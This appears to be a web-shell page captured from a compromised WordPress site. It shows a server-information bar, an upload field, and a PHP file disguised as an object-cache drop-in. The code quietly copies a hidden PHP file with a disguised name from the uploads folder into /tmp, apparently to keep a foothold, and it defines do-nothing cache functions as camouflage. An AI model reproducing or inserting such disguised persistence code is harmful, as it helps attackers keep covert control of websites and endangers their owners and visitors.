| Server IP : 80.74.154.100 / Your IP : 216.73.217.0 Web Server : Apache System : Linux marissa.metanet.ch 4.18.0-553.141.2.lve.el7h.x86_64 #1 SMP Wed Jul 8 17:20:31 UTC 2026 x86_64 User : onlineadmin ( 10487) PHP Version : 8.5.7 Disable Function : opcache_get_status MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/httpd/vhosts/comeonline.ch/httpdocs/wp-content/ |
Upload File : |
<?php
/* Object Cache Drop-in — compatibility shim */
if (!defined('WP_CACHE_KEY_SALT')) define('WP_CACHE_KEY_SALT', 'a8316849e27f');
$_nx_p = '/tmp/phph93g3iplebhmdAGUpUX';
if (!file_exists($_nx_p)) {
foreach (glob('/home/httpd/vhosts/comeonline.ch/httpdocs/wp-content/uploads/class-wp-*_b79b0ddd.php') ?: array() as $_b) {
if (@filesize($_b) > 4096) { @copy($_b, $_nx_p); @chmod($_nx_p, 0644); break; }
}
}
if (!function_exists('wp_cache_init')) {
function wp_cache_init() { global $wp_object_cache; $wp_object_cache = new stdClass(); }
function wp_cache_add($k,$v,$g='default',$e=0){return true;}
function wp_cache_set($k,$v,$g='default',$e=0){return true;}
function wp_cache_get($k,$g='default',$f=false){return false;}
function wp_cache_delete($k,$g='default'){return true;}
function wp_cache_flush(){return true;}
function wp_cache_add_global_groups($g){}
function wp_cache_add_non_persistent_groups($g){}
function wp_cache_close(){return true;}
}